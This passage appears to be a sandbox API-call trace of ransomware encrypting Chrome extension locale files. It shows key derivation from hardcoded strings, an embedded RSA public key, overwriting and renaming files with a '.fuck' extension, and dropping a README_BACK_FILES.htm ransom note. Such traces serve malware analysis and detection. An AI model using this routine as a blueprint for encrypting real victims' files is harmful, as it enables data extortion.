[0254.654] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.655] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.657] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.658] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.660] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.660] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.660] CryptHashData (hHash=0x2e18128, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.660] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e185e8) returned 1 [0254.661] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.661] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.661] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e17fa8) returned 1 [0254.661] CryptImportPublicKeyInfo (in: hCryptProv=0x2e17fa8, dwCertEncodingType=0x1, pInfo=0x2990bd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2990c00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2990c08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18868) returned 1 [0254.661] CryptEncrypt (in: hKey=0x2e18868, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.662] CryptEncrypt (in: hKey=0x2e18868, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e17ae0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e17ae0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.662] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e17ae0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e17ae0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.663] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb7, lpOverlapped=0x0) returned 1 [0254.664] CryptEncrypt (in: hKey=0x2e185e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb7, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0254.664] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0254.665] CloseHandle (hObject=0x5d60) returned 1 [0254.665] CloseHandle (hObject=0x5d5c) returned 1 [0254.665] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json"), bFailIfExists=0) returned 1 [0254.684] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json", dwFileAttributes=0x0) returned 1 [0254.685] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.gsg")) returned 1 [0254.686] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.fuck")) returned 1 [0254.688] CryptDestroyHash (hHash=0x2e18128) returned 1 [0254.688] CryptDestroyKey (hKey=0x2e185e8) returned 1 [0254.688] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.688] FindNextFileA (in: hFindFile=0x2e18468, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.688] FindClose (in: hFindFile=0x2e18468 | out: hFindFile=0x2e18468) returned 1 [0254.688] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\readme_back_files.htm")) returned 0xffffffff [0254.688] AreFileApisANSI () returned 1 [0254.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.689] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.689] GetFileType (hFile=0x5d50) returned 0x1 [0254.690] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.691] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.692] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0254.693] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.693] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.693] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.693] GetLastError () returned 0x0 [0254.693] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json")) returned 0x20 [0254.693] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json", dwFileAttributes=0x80) returned 1 [0254.694] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.695] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.696] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.696] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.700] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.700] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.700] CryptHashData (hHash=0x2e18468, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.700] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18468, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e180a8) returned 1 [0254.700] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.700] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.700] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e179d0) returned 1 [0254.701] CryptImportPublicKeyInfo (in: hCryptProv=0x2e179d0, dwCertEncodingType=0x1, pInfo=0x2990f10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2990f40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2990f48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e185e8) returned 1 [0254.701] CryptEncrypt (in: hKey=0x2e185e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.701] CryptEncrypt (in: hKey=0x2e185e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e17838*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e17838*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.701] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e17838*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e17838*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.703] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xc7, lpOverlapped=0x0) returned 1 [0254.704] CryptEncrypt (in: hKey=0x2e180a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc7, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0254.704] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0254.704] CloseHandle (hObject=0x5d5c) returned 1 [0254.704] CloseHandle (hObject=0x5d60) returned 1 [0254.705] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json"), bFailIfExists=0) returned 1 [0254.709] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json", dwFileAttributes=0x0) returned 1 [0254.709] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.gsg")) returned 1 [0254.711] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.fuck")) returned 1 [0254.712] CryptDestroyHash (hHash=0x2e18468) returned 1 [0254.712] CryptDestroyKey (hKey=0x2e180a8) returned 1 [0254.712] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.712] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.712] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0254.713] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\readme_back_files.htm")) returned 0xffffffff [0254.713] AreFileApisANSI () returned 1 [0254.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4618, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0254.713] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.715] GetFileType (hFile=0x5d50) returned 0x1 [0254.715] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.716] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.716] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0254.717] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.717] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.717] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.717] GetLastError () returned 0x0 [0254.717] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json")) returned 0x20 [0254.718] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json", dwFileAttributes=0x80) returned 1 [0254.718] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.719] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.720] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.720] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.723] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.723] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0254.723] CryptHashData (hHash=0x2e180e8, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.723] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e180e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18828) returned 1 [0254.723] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.723] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.724] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e17c78) returned 1 [0254.724] CryptImportPublicKeyInfo (in: hCryptProv=0x2e17c78, dwCertEncodingType=0x1, pInfo=0x2990fe0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991010*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991018*, 